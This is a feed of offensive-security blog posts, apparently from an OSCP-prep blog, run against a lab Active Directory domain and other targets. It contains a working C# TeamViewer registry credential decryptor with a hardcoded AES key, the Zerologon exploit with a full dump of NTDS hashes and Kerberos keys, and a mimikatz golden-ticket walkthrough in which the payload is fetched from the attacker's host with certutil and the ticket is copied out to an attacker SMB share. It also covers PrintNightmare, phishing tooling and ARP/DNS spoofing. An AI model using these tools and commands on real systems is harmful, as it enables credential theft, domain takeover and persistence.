FTP Float Exploiting: [Windows x86] Buffer Overflow [I]

 Hi everyone!,

so far so good,in this post i'm going to explain hot to exploit an RCE over Buffer overflow smash attack type.

The choosen vulnerable software is Float FTP installed over  Windows XP x86 architecture.

The software:

The connection from attacker machine:

Debugger software: Immunity Debugger with mona python plugin

Buffer Overflow exploit Source Code available on my github:

https://github.com/f0ns1/-Exploiting-BufferOverflow/tree/main

Exploit execution:

I promise create a full and deep explaination about how to create the exploit with the following stepts:

- Undesrtand the vulnerability

- Assembler quick introduction: operations/register/stack/heap

- fuzzing

- ciclycal pattern in order to obtain offset

- EIP registry control

- Shell code injection

With best regards!, i hope that you enjoy we keep in touch ;) F0ns1.

  

OSCP_labs [BBSCute] linux [II]

Linux -CuteNews 2.1.2  exploit +  Hping3 (old version) privilege escalation

OSCP_labs [infosecPrep] linux [I]

 

[Linux] easy level:

Active Directory CORPORATIVE.domain.local Series[XI] : PrintNigthmare Privelege scalation

Hi everyone!.

So far so good in this post i perform a local privilege escalation with the knowledge vulnerability of 2021.

Printnightmare

A non administrative user could create a new printer driver:

CVE-2021-1675 - CVE-2021-34527

https://github.com/ly4k/PrintNightmare

https://github.com/calebstewart/CVE-2021-1675

└─$ python3 printnightmare.py  -check  "Administrator:Passw0rd1@10.0.2.22"                            

Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!

   

Validate sharing printers from external attacker machine to the target server:

                          

Execute privilege scalation exploit on the target system:

Verify from psexec exeternal connection using smb protocol writing on  C$:

And this is all, for this kind of attack i hope that all the companies apply the recommended vendor patches!!.

best reagrds, f0ns1

RedTeam Challenge: Project S0c14l M3d1a series[III]

 Hi everyone!,

so far so good!, in this post i'm going to explain how to perform a socialnetwork attack [Phising], with an easy tool:

https://github.com/xHak9x/SocialPhish

https://my.freenom.com/

https://tinyurl.com/app/

And this is all, for this kind of attack i hope that everyone review the urls and the links of the emails/direct messages on social networks , etc.

best reagrds, f0ns1

Active Directory CORPORATIVE.domain.local Series[X] : Zerologon attack

 Hi everyone!!,

So far so good, in this post i'm going to explain how to perform the zerologon attack over Active directory on my local company environment COOPERATIVE.DOMAIN.local

This vulnerability was detected on the las year 2020, and allow to a remote and unauthenticated attacker obtain all hashes on Windows server Active Directory target machine:

CVE-2020-1472

The first step is detected if the target system is vulnerable to this exploit, for this task is possible use the follow script develop on python:

https://github.com/SecuraBV/CVE-2020-1472

And in order to perform the attack it's possible exploit use the following exploit:

https://github.com/risksense/zerologon

Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrador:500:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CORPORATIVE.DOMAIN.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74b9c26e436d8ceacd2db129dbed8091:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CORPORATIVE.DOMAIN.local\worker1:1106:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\worker2:1107:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\SVC_service:1109:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\NP_user:1110:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\test_user:1111:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE-DOM$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WKS-002$:1103:aad3b435b51404eeaad3b435b51404ee:26ea21a020599bf2757bdef562adbcc7:::

WKS-001$:1104:aad3b435b51404eeaad3b435b51404ee:efe101633fb3881f250d512d388cb700:::

[*] Kerberos keys grabbed

CORPORATIVE.DOMAIN.local\krbtgt:aes256-cts-hmac-sha1-96:178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e

CORPORATIVE.DOMAIN.local\krbtgt:aes128-cts-hmac-sha1-96:84edbefb34b31b613865a44d4bf66e05

CORPORATIVE.DOMAIN.local\krbtgt:des-cbc-md5:46a25ef4f8cbec0d

CORPORATIVE.DOMAIN.local\worker1:aes256-cts-hmac-sha1-96:4686da5eda179be4c46be0524b5590509408301b15a03150cc901d58dc25ea02

CORPORATIVE.DOMAIN.local\worker1:aes128-cts-hmac-sha1-96:a5272782e4809030425764777b89b377

CORPORATIVE.DOMAIN.local\worker1:des-cbc-md5:0816198940dae589

CORPORATIVE.DOMAIN.local\worker2:aes256-cts-hmac-sha1-96:fb1ac4dd6cdc58614db210da4296f60f4f76931c7ed783ba7d4c2d23ab6ae153

CORPORATIVE.DOMAIN.local\worker2:aes128-cts-hmac-sha1-96:f55967570c4b562cc3fdd696d37603cc

CORPORATIVE.DOMAIN.local\worker2:des-cbc-md5:5bb5cb23076e5eef

CORPORATIVE.DOMAIN.local\SVC_service:aes256-cts-hmac-sha1-96:53cb07135999888c62a8cf58a449cc24e89ad12c3dd5f26d373657947fc2578f

CORPORATIVE.DOMAIN.local\SVC_service:aes128-cts-hmac-sha1-96:08398a5e5779afef70121bd2fe8c5153

CORPORATIVE.DOMAIN.local\SVC_service:des-cbc-md5:5b29adb0efa81691

CORPORATIVE.DOMAIN.local\NP_user:aes256-cts-hmac-sha1-96:f537750e75139946ed51cfb8337314d127a17d3137a5ef8efec6b0becabebaac

CORPORATIVE.DOMAIN.local\NP_user:aes128-cts-hmac-sha1-96:07301297fb5aad297fb0a6b7bd2eeeed

CORPORATIVE.DOMAIN.local\NP_user:des-cbc-md5:a4296d1c2ce010c7

CORPORATIVE.DOMAIN.local\test_user:aes256-cts-hmac-sha1-96:d24ab0db83b636a6065d12d7451cbe5d8512a381caccac9e94ddd3ca2d0844d9

CORPORATIVE.DOMAIN.local\test_user:aes128-cts-hmac-sha1-96:48bf29b09e9d4753f58c9a249cc3ec4b

CORPORATIVE.DOMAIN.local\test_user:des-cbc-md5:15801c91c8a7ea29

CORPORATIVE-DOM$:aes256-cts-hmac-sha1-96:7ffab151f9fc7485b70447cab3373921338bf88906703fd5d4deb9d4a87fde16

CORPORATIVE-DOM$:aes128-cts-hmac-sha1-96:2d714652efe8aec574dd8ffce8e7ef8e

CORPORATIVE-DOM$:des-cbc-md5:a4e6b6ae5837806d

WKS-002$:aes256-cts-hmac-sha1-96:bc3ef9250185b6844385fae85f47c69e0e21f9e69a7ff2a9a5fd0fa28fdd91c9

WKS-002$:aes128-cts-hmac-sha1-96:c7431351b05123fcd6039f1611db23a4

WKS-002$:des-cbc-md5:32b6861998ba5e1c

WKS-001$:aes256-cts-hmac-sha1-96:57ee7e4e906c0fa2e8eea3b1dfadb4e6a4e036ae0c8e8b47728da431068a7efb

WKS-001$:aes128-cts-hmac-sha1-96:d34b1290f3df609fe9aa4d808004ee98

WKS-001$:des-cbc-md5:020be94686e05e07

[*] Cleaning up... 

And access using pass the hash:

 This vulnerability as you can see on the following documentation, could be exploited becaus the function: ComputeNetlogonCredential don't take a random value of IV initialitation vector during encryption symetric AES operation,

https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/

And this is all, for this kind of attack i hope that all the companies apply the recommended vendor patches!!.

best reagrds, f0ns1

 

Teamviewer Extract credentials [csharp]

 

Hi everyone,

Teamviewer extract credentials for registry:

Source code :

using System;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;

namespace DecryptTeamViewer
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");

// TeamViewer version
Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));

// User info
Console.WriteLine("\r\n=== User Information ===\r\n");
Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));

// Proxy info
Console.WriteLine("\r\n=== Proxy Information ===\r\n");
Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
var proxyPass = (byte[])GetRegValue("TeamViewerSettings", "ProxyPasswordAES");
Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));

// Credentials

Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");
// Options pass
var optionsPass = (byte[])GetRegValue("TeamViewerSettings", "OptionsPasswordAES");
Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));
// Server pass
var serverPass = (byte[])GetRegValue("TeamViewerSettings", "ServerPasswordAES");
Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));
// Security pass
var securityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordAES");
var exportedSecurityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordExported");
Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));
// License
var licenseKey = (byte[])GetRegValue("TeamViewerSettings", "LicenseKeyAES");
Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");

}
public static object GetRegValue(string hive, string value)
{
// Gets registry values from TeamViewer keys
Object regKeyValue = new Object();
if (hive == "TeamViewerSettings")
{
var regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer\Version7", false);
if (regKey != null)
{
regKeyValue = regKey.GetValue(value);
}
return regKeyValue;
}
else if (hive == "TeamViewerUserSettings")
{
var regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer\Version7", false);
if (regKey != null)
{
regKeyValue = regKey.GetValue(value);
}
return regKeyValue;
}
else
{
regKeyValue = null;
return regKeyValue;
}
}

public static string DecryptAES(byte[] encryptedPass)
{
try
{
// AES settings
Aes aes = new AesManaged
{
Mode = CipherMode.CBC,
BlockSize = 128,
KeySize = 128,
Padding = PaddingMode.Zeros
};
// TeamViewer Key & IV
byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };

// Decrypt AES passwords
ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV);
if (encryptedPass != null)
{
var decrytedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
string plaintextPass = Encoding.Unicode.GetString(decrytedPass);
return plaintextPass;
}
else
{
return null;
}
}
catch (Exception)
{
return null;
}
}

}
}

flag{

50ImuYChUng0FFl0l0l0l0

.}

Best regards, f0ns1

[hacking with python] : webpage exploit [II] Privilege scalation and persistence streaming

Hi everyone,

This is the second part of my series : [hacking with python] : webpage exploit

Hacking on streaming !!

And this is all, so easy !!!

best regards f0ns1

Active Directory CORPORATIVE.domain.local Series[IX] : GoldenTicket

 Hi eveyone!

So far so good !, On this post entry i'm going to introduce yourself to exploit Active Directory directly to Domain Controller obtainng a golde tocket, This  kind of attck exploit directly to KDC (Kerberos Domain Controller), to obtain a ticket that provide to us a full persistence with administative privileges during ten years.

It's completely needed be performed this attack with administrator privileges on the Windows Active Directory.

1. EXPLOITATION:

    1.1 SHARE MIMIKATZ 

        kali@kali:~/Descargas/x64$ python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

    1.2 OBTAIN MIMITAKZ BINARY

        

            

        C:\Users\worker2\golden_ticket>certutil.exe -urlcache -f http://10.0.2.19:8989/mimikatz.exe mimikatz.exexe

****  En línea  ****

CertUtil: -URLCache comando completado correctamente.

C:\Users\worker2\golden_ticket>dir

 El volumen de la unidad C no tiene etiqueta.

 El número de serie del volumen es: BE72-396A

 Directorio de C:\Users\worker2\golden_ticket

20/09/2021  17:05    <DIR>          .

20/09/2021  17:05    <DIR>          ..

20/09/2021  17:05         1.355.680 mimikatz.exexe

               1 archivos      1.355.680 bytes

               2 dirs   3.095.617.536 bytes libres

C:\Users\worker2\golden_ticket>

PS C:\Users\Administrador> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::lsa /inject /name:krbtgt

Domain : CORPORATIVE / S-1-5-21-2048228633-4105951457-1013245227

RID  : 000001f6 (502)

User : krbtgt

 * Primary

    NTLM : 74b9c26e436d8ceacd2db129dbed8091

    LM   :

  Hash NTLM: 74b9c26e436d8ceacd2db129dbed8091

    ntlm- 0: 74b9c26e436d8ceacd2db129dbed8091

    lm  - 0: 0b85525f2bc07e8ddad5bc5116cda6be

 * WDigest

    01  529e053364e99c40018a763d093cd2d0

    02  0f153570e5bfc1beaf7af4548fe55407

    03  a2e7ca6217279efd9902dfec4f9c1ffc

    04  529e053364e99c40018a763d093cd2d0

    05  0f153570e5bfc1beaf7af4548fe55407

    06  a65e056b499477f816ceba51675d9710

    07  529e053364e99c40018a763d093cd2d0

    08  1afdffdfbb1a96b9eac70bf7c56c9918

    09  324a2bb9f95d144266eb7bccbe84e5ba

    10  560e55940f267584289f89a10c3a6a56

    11  c05c279a357cd56256c778bf63d45005

    12  324a2bb9f95d144266eb7bccbe84e5ba

    13  4d711b818095960a87259fa4fe347d3a

    14  c05c279a357cd56256c778bf63d45005

    15  080bb5dadc9fda118ed49eb23b1dec81

    16  c3c6dfa2a8c55fe7bd5460d3950d9cce

    17  dd4ec696ec2268f292b30966168ba6d2

    18  20bf77d7ae1c83731480dd3d58b83ead

    19  aa99179fb3b127c835e5c88014d5094f

    20  a94702c74ded36fba7260a834ae0a6ee

    21  c4c9af7a348d2321b2a366d16e26fc31

    22  c4c9af7a348d2321b2a366d16e26fc31

    23  0bac9a385f379934e709b3b9f2e1a6ee

    24  2b72cae08c1e9fb1c73e32b2418f237c

    25  127f40e154898bb85c338eed76bf7b28

    26  524d56073be5780737d7ffc2ed602391

    27  035dd1bc3fec5eacd425087efaefa33a

    28  d62ace76ae0c72b115a5f75d421c10cd

    29  9b274c0df827c3cf78d946c7d2f2a5a2

 * Kerberos

    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt

    Credentials

      des_cbc_md5       : 46a25ef4f8cbec0d

 * Kerberos-Newer-Keys

    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt

    Default Iterations : 4096

    Credentials

      aes256_hmac       (4096) : 178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e

      aes128_hmac       (4096) : 84edbefb34b31b613865a44d4bf66e05

      des_cbc_md5       (4096) : 46a25ef4f8cbec0d

 * NTLM-Strong-NTOWF

    Random Value : f155a5de1b36973934e6291d7cc9c252

Generate golden ticket (KIRBI):

mimikatz # kerberos::golden /user:Administrador /domain:CORPORATIVE.DOMAIN.local /sid:S-1-5-21-2048228633-4105951457-101

3245227 /krbtgt:74b9c26e436d8ceacd2db129dbed8091 /ticket:ticket

User      : Administrador

Domain    : CORPORATIVE.DOMAIN.local (CORPORATIVE)

SID       : S-1-5-21-2048228633-4105951457-1013245227

User Id   : 500

Groups Id : *513 512 520 518 519

ServiceKey: 74b9c26e436d8ceacd2db129dbed8091 - rc4_hmac_nt

Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13

-> Ticket : ticket

 * PAC generated

 * PAC signed

 * EncTicketPart generated

 * EncTicketPart encrypted

 * KrbCred generated

Final Ticket Saved to file !

List the ticket file:

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac

   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45

   Server Name       : krbtgt/CORPORATIVE.DOMAIN.LOCAL @ CORPORATIVE.DOMAIN.LOCAL

   Client Name       : Administrador @ CORPORATIVE.DOMAIN.LOCAL

   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

Share smbfolder from kali attaker machine:

 And copy ticket content:

C:\Users\Administrador>copy ticket \\10.0.2.19\smbfolder\

        1 archivo(s) copiado(s).

1.3 GOLDEN TICKET (CCACHE ):

Execute ticketer.py tool for obtain a ccache file:

 

List Ccache file:

root@kali:/home/kali/Master/lab4/test/data# ls -ltrh f0ns1*

-rw-r--r-- 1 root root 1,1K sep 27 20:54 f0ns1.ccache

 

Export environment variable:

export KRB5CCNAME=’f0ns1.ccache’

 

Access with f0ns1 user as nt Authority\system without credentials:

And this is all, for last Active directory attack, I hope that you enjoy with my nineth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

Rogue Servers: network attacks FTP series [I]

 Hi every one,

So far so good, today we are going to perform a network local attack using rogue servers on with auxiliary modules of metasploit framework.

Type of attack FTP server:

    - The flag is capture the user  credentials.

Attack one:

    - Directly connection between victim and attacker server (test ftp capture credentials)

Attack two:

    - ARP spoofing with my own hacking python tool:

    https://github.com/f0ns1/evilHackingPythonTool

    - DNS spoofing with an other python hacking tool:

    https://github.com/f0ns1/mitm_process.py

    - Spoofing connection between client and "fake" web ftp server:

And this is all for this, kind of ftp network server attack.

I hope that, this attack could be helpful for you and enjoy.

regards, f0ns1.

[hacking with python] : webpage exploit

 

    

SOURCE CODE :

source code github